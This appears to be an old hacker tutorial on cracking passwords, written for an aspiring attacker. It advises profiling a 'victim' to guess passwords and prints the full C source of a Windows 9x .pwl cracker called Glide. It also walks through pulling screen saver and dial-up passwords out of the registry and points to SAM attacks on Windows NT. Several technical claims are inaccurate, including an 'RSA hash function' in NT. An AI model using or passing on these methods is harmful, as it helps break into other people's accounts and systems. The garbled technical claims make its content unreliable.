Password Cracking Decrypted
All of you would probably must have come across the term 'password'. Ever wondered why
exactly passwords work and how to crack them? Well, this manual will answer all your queries
about passwords and make you an expert in cracking passwords.
First of all, what exactly is a password.A password is best described as a verification or an
authentication tool or object. Passwords are used to ensure legal and proper access to only those
people who have the authority or the permission to view the data.A password is required in many
places,you are required a password, to access your Inbox, you are required a password to dial up
to your Internet Service Provider and in some organisations you also need to enter a password to
start the system.At all places the Username and Password pair is used to authenticate the user.
Usernames are used to identify the user and the password is used to authenticate the user and
for every unique username there is a unique password.Take the example of the Lock and Key, for
every lock you need a unique key to open it and enter.Here the Lock acts as the Username and
the password would be the key.So passwords are as important as the key of your house.
Your house remains safe as long as only you who is the rightful owner has the key and no one
else finds it.Similiarly, the concept behind passwords is that it is only the rightful owner who
knows the password and no one else knows it.Everyday we hear about password stealing,
computer break ins etc.Sometimes the user chooses very lame passwords which are easily
guessed by hackers.There are certain guidelines which I would like to tell you which you must
keep in mind while choosing a password:
1. Never keep your password same as your Username
2. Never choose your own name, Date of Birth, spouse's name, pet's name, child's name etc as
your password, those are the first ones which are tried by a hacker.
3. Some people are so lazy that they keep their password to be 'Enter' (Carriage return)
4. Try to choose a word which is not in the dictionary and contains both numbers and alphabets,
and if possible use both Lower Case and Upper Case alphabets and also symbols like
(#,$,%,^ etc) as they can be cracked only be brute force password crackers which take too
long a time to crack.
You may say that choosing of weak passwords is responsible for the large number of hacks, but
people themselves are the weakest chain in the whole authentication process.Most people
usually use lame passwords like those I mentioned above, and those who use excellent
passwords are not able to remember them and then write the password down on a piece of paper
and stick it on their monitor.One should try his level best to remember weird passwords if he
wants to keep his system secure.The best places where you can find the passwords, would be
beneath the keyboard, behind the CPU or even on the sides of the monitor.
Some people have trouble remembering the large number of passwords that they are asked for,
while using various services, as a result they use the same password everywhere.Thus knowing
even a single password might help in some cases.
Password Cracking
The most common method of password cracking is password guessing, although it requires a lot
of luck, it can be successful sometimes.To start to guess the password, you first need to gather
all kinds of info about the victim.(See the Guidelines of keeping a password for more details.)
The most common and the most successful method of password cracking is th use of password
crackers.Now what exactly are password crackers? Now to understand what a password cracker
is and how it works, you first need to understand how a person is authenticated.
When you are creating a new account or registering or running the setup(basically whenever you
create a new account by entering the Username and Password.) you might be asked for the
Username and Password.The username is mostly stored in plaintext, but the password that you
enter is stored in an encrypted form.Now when you enter the password, it is passed through a pre
defined algoritm and is thus encrypted and is stored on the hard disk.So next time when you use
the account and enter the password, the text (password) you type is passed through the same
algorithm and is compared with the earlier stored value.If they both match, the user is
authenticated else the authentication fails.
The algorithm that is used to encrypt the password is a one way algorithm, by that I mean that if
we pass the encrypted password through the reverse algorithm, we will not get the original
plaintext password.
Lets take an example to make it more clear: Say your plaintext password is xyz123 and it is
passed through an algorithm and stored in the a file as 0101027AF. Now if you get his encrypted
password and know the algorithm which xyz123 is passed through to get 0101027AF, you cannot
reverse the algorithm to get xyz123 from 0101027AF.
When you are typing in your password, the computer does not display it in plaintext but instead
shows only stars i.e. ******** so that if someone is shoulder surfing, he cannot find out the
password.The text box has been programmed in such a way.On most forms Unix you will not
even see the asterix marks and the cursor will not move, so that neither does a person shoulder
surfing, find out the password nor does he find out the length of the password.
Password Crackers are of two types-: Brute Force and Dictionary Based.
Dictionary Based password Crackers try out all passwords from a given pre defined dictionary list
to crack a password.These are faster but more often than not are unsuccessful and do not return
the password.As they do not try out all combinations of possible keys, they are unable to crack
those passwords which have symbols or numbers in between.
Brute Force Password Crackers try out all combinations of all keys which can be found in the
keyboard (i.e. Symbols, Numbers, Alphabets) both Lower Case and Upper Case.These kinds of
Password Crackers have a greater success rate but take a long time to crack the password.As
they take all possible keys into consideration, they are more effective.
Now that you know the two main types of password crackers lets see how they work.
As passwords are encrypted by a one way algorithm, password crackers do not extract the
password from the file but instead take the combination of letters, encrypt them by passing the
characters through the original algorithm and compare this value with the stored encrypted
value.If these two match, then the password cracker displays the password in plaintext.
Cracking The Windows Login Password
The Windows ( 9x) password is passed through a very weak algorithm and is quite easy to crack.
Windows stores this login password in *.pwl files in the c:\windows directory.The .pwl files have
the filename which is the username coresponding to the password stored by it.A typical .pwl file
would be as follows:
Note: This .pwl file has been taken from a Win98 machine running IE 5.0
###############CUT HERE##############
ã‚…–
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR
p u.ÐX+|rÐq”±/2³ Êå¡hCJ‚D × `ÍY¥!íx}(qW¤ãƱ<!?àÜ6šá˜ôæ
4+\¾õ+%E°ËÔýmÇÔ ÞI»‚ B àלøÐ…'@
############CUT HERE#############
Lets go through the contents of this .pwl file.I am not sure what the first line signifies, but my
guess would be that it is the Name to which the computer is registered to.The next four lines have
just been entered by Windows and are not readable.The last two lines is the password but in the
encrypted form.There is no way to get the plaintext password by just studying the Windows
algorithm and these lines.To actually crack the password you need a simple but kewl cracker
coded in C called Glide.I have included the code below.If you have a sound C knowledge you can
study the code and actually experience how a password cracker works and how a password is
encrypted in Windows i.e. more about the Windows encryption algorithm.
*********************
Newbie Tip: All exploits, crackers, mail bombers practically everything related with Hacking has
been written in either Perl or C. If you really want to be considered an elitte hacker, you have to
know how to program, without a sound knowledge of either C (C++) or Perl you cannot hack
successfully.Almost all exploits available on the net have an important part edited or missing,
without which it has no use.Some exploits may be needed to be edited in order to be run in your
platform.In order to do all this programming is needed.
********************
#include <stdio.h>
#include <string.h>
#include <process.h>
#include <stdlib.h>
#include <ctype.h>
#include <conio.h>
unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];
void main (int argc,char *argv[]) {
FILE *fd;
int i,j,k;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; /* recource allocation table */
if (argc<2) {
printf("usage: glide filename (username)");
exit(1);
}
/* read PWL file */
fd=fopen(argv[1],"rb");
if(fd==NULL) {
printf("can't open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd)) {
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);
/* find username */
name=argv[1];
if(argc>2) name=argv[2];
printf("Username: %s\n",name);
/* copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0) cracked=0;
if(cracked>1000) cracked=1000;
memcpy(keystream,Data+0x208,cracked );
/* generate 20 bytes of keystream */
for(i=0;i<20;i++) {
ch=toupper(name[i]);
if(ch==0) break;
if(ch=='.') break;
keystream[i]^=ch;
};
cracked=20;
/* find allocated recources */
sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask: %04X\n",sizemask);
for(i=0;i<256;i++) Rall[i]=0;
maxr=0;
for(i=0x108;i<0x208;i++) {
if(Data[i]!=0xff) {
Rall[Data[i]]++;
if (Data[i]>maxr) maxr=Data[i];
}
}
maxr=(((maxr/16)+1)*16); /* recource pointer table size appears to be divisable by
16 */
/* search after recources */
Rpoint[0]=0x0208+2*maxr+20+2; /* first recource */
for(i=0;i<maxr;i++) {
/* find size of current recource */
pos=Rpoint[i];
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]);
if( (Rall[i]==0) && (rsz!=0) ) {
printf("unused resource has nonzero size !!!\n");
printf("If last line produced any : You may try to recover\n");
printf("press y to attempt recovery\n");
ch=getch();
if(ch!='y') exit(0);
rsz=2;
i-=1;
}
pos+=rsz;
/* Resources have a tendency to have the wrong size for some reason */
/* check for correct size */
if(i<maxr-1) {
while(Data[pos+3]!=keystream[1]) {
printf(":",Data[pos+3]);
pos+=2; /* very rude may fail */
}
}
pos+=2; /* include pointer in size */
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
/* insert Table data into keystream */
for(i=0;i <= maxr;i++) {
keystream[20+2*i]^=Rpoint[i] & 0x00ff;
keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d bytes of keystream recovered\n",cracked);
/* decrypt resources */
for(i=0;i < maxr;i++) {
rsz=Rpoint[i+1]-Rpoint[i];
if (rsz>cracked) rsz=cracked;
printf("Recource[%d] (%d)\n",i,rsz);
for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
printf("\n");
}
exit(0);
}
Windows Screen Saver Password
This is an interesting hack and not many people know about it.This requires no canned hacking
tool, we will crack the password manually!!! First of all, why do we need to crack the Windows
Screen Saver? How does it restrict us? If a Screen Saver is password protected, then whenever it
is turned on, then in order to turn it off, you need to enter a password.It does not allow us to do
anything on a system until and unless we enter the password. We will keep seeing the screen
saver until we authenticate ourselves by entering the password.No not even CTRL+ALT+DEL
works in this case. Windows stores the Screen Saver password in the user.dat file in the
Windows directory.If you have multiple profiles on your system then it is stored in the user.dat file
in the c:\windows\profiles\username directory.(On Win 3x systems it is stored in the control.ini file
The user.dat file constitues the registry of the Windows system, thus we can say that the
Windows Screen Saver Password is stored in the registry.
First of all, you need to change the attributes of this file and make it editable by right clicking on it
and unselecting the Read Only Option else you will not be able to edit it.
Once this is done, open this file in WordPad (Any text editor will do except MS WORD And
Notepad.)Now look for the string: ScreenSave_Data
You will find an even number of characters after Data, this is the Screen Saver Password
encrypted and stored in the hex system.Each pair or hex values represent a single ASCII
plaintext character.This means that if there are 10 hex values then the password is of 5
characters, each pair of Hex values standing for a single plaintext ASCII character.So in order to
get the Plaintext password you just need to decrypt these hex values into ASCII.
Internet Dial Up Password
Have you ever wondered where Windows stores the Internet Connection Password when you
have enabled the 'Save Password' option in the 'Connect To' dialog box of the dial up connection.
Well this password is stored in the registry in the following registry key:
HKEY_CURRENT_USER\RemoteAccess\Profile\<connection name>
If you view the above key in the registry Editor then it probably will not appear understandable. If
you want to be able to understand the contents of this key and hence be able to edit this key,then
you will have to export this particular key and view it in Notepad.The password is stored in stored
as binary values and has to be converted into plantext ASCII before you are able to read it.
Windows NT Password
You have already seen how lame Windows 9x password encrypting algorithm is and how easy it
is to overide the Windows Login Password prompt in Win9x systems, well NT is a different
story.First of all lets see how the password is stored in NT….firstly the password is not encrypted,
it is hashed using the RSA hash function and then this hashed version is passed through am
algorithm to obscure it, once onscured,it is stored in the NT registry.Alongwith a stonger
password storing tecnique it all ships with various utilities which make it more secure….Service
Pack 2 ships with a dll which allows the system adminstrators to ensure that the Passwords used
by the users are strong or good enough.The User Manager can be configured to ensure that the
user passwords satisfy a particular condition, For example, it can check if the Users are using a
password of minimum length.
If you really want to learn all about NT security, you should read the NTBugtraq archives and join
their mailing list.The NTBugtraq Archive is the most comprehensive and exaustive collection of
NT Security info.Visit them at www.ntbugtraq.com
The site has everything that you would want to know about NT including the algorithm used to
obscure the hased password.There are various ways of getting administrator previledges in NT, I
am not mentioning all of them but have mentioned my favourite….Sam Attacks.If you want to
learn about all the ways of breaking into NT, then I recommend you to read the BugTraq
Arvhives.I would also be writing a Manual on Hacking NT quite Soon.
